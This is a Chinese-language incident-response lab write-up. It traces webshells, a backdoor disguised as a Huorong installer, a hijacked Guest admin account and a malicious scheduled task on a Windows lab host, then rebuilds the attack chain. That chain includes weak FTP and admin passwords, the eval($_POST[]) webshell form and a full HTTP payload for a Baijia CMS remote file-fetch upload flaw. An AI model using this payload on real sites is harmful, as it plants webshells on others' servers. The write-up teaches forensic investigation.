文章目录
关注我们,咱们在安全的路上,扬帆起航
Where-1S-tHe-Hacker-P2
0.场景描述
水哥是某公司的一名运维,某天他在日常巡检的过程中发现了异常,敏锐的他感觉到了事情的不妙,于是联系同事要到了你的电话,请你帮助他解决这个难题。
1.隐患排查
本文的思路仅仅是按照靶场内容建设,并不与真实环境下的排查方案一致
靶机用户和密码
用户:admin
密码:Aa123456
1.1 webshell 后门查杀
使用D盾、河马等查杀工具,对web目录下的文件进行查杀
可以看到一大堆意思后门,且内容均为 eval($_POST[]
);` 形式,打开文件对应位置,并且查看文件信息:创建时间、修改时间和访问时间,根据创建时间可以知道文件落地时间
1.2 后门查杀
针对后门查杀,我们可以使用杀毒软件直接进行查杀,这里我使用的是火绒
排除webshell的干扰,我们可以看到在 C:\windows\Temp
下存在一个可疑文件 huorong.exe
打开文件相应位置可以看到是一个伪装成火绒安装包的后门文件,查看文件属性创建时间为2023年11月15日7:45:47
1.3 后门用户检测
1.3.1 windows event
可以使用windows的时间管理工具中的日志筛选功能,对事件ID为4720和4732的时间进行筛选
1.3.2 D盾克隆账号检测
也可以使用D盾的克隆账号检测功能,这里我们尝试使用D盾的克隆账号检测功能
在扫描的结果中,可以很清晰的看到,Guest账号被启用并添加进管理员组
为什么首当其冲的怀疑这个账号呢?
1.3.2.1 Guest账号
Windows中的Guest账户是一个特殊的用户账户,它允许用户在没有创建个人账户的情况下访问计算机。由于Guest账户的权限较低,它不适合需要执行高级任务或访问敏感信息的用户
1.4 计划任务、服务、开机自启动项查杀
这里我们可以使用独立安装版火绒剑,这款工具官方已经下架,需要自己搜寻一下资源,而且目标主机上最好不要安装火绒最新版,最新版的火绒会识别火绒剑的程序并禁用
打开火绒剑,一次查看 启动项
-> 计划任务
,我们可以很清晰的看到一个安全状态为未知的疑似火绒安装包程序被加入了开机启动项程序,右键查看属性,可以看到,正是我们之前通过火绒查杀出来的后门文件
Win+R,输入 taskschd.msc
启动任务计划程序,定位到 \Microsoft\Windows\AppID\
,找到上文中 Microsoft SysnomCon
程序
右键导出异常计划任务 Microsoft-SysnomCon
即可查看到详细信息,这里显示注册时间为2023年11月15日8:02:20
2. 利用链分析
2.1 FTP 弱口令
攻击者尝试使用 anonymous 和 ftp 用户尝试登录
使用 ftp/123456 成功登录主机FTP服务
可以看到我们当前 FTP 所在的目录正是 webshell 的目录
2.2 站点后台管理员弱口令
对于一个 web 站点,我们通常会尝试对其登录页面进行弱口令登录尝试,登录成功往往会有 Js 页面跳转
、 Get Param url跳转
和 30x 页面重定向
等标志
访问首页地址 http://localhost/index.php?mod=mobile&act=public&do=index&beid=1
,发现是一个登陆界面,我们尝试对其账号密码进行弱口令爆破
成功使用 admin/123456 成功登录管理员后台界面
2.3 Baijia CMS 后台任意文件上传漏洞
payload:
GET /index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http://远程地址/文件.php HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pusi68o14jke80q64hcg8ram20; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=
Connection: close
可以加载指定URL文件到本地,存储路径会在 HTTP Response 中显示,这里我们尝试上传一个不同域中的
访问返回包中的路径,成功显示 PHPinfo 的内容,文件上传成功
可以在 /index.php?mod=site&do=file&act=public&op=local&beid=1
路径中查看到所有上传文件的路径
上面排查的webshell后门可以分析一部分可能是通过 FTP 上传功能上传到web站点的,一部分可能通过此处文件上传漏洞上传的
可以在web日志中很清楚的看到后门文件通信的时间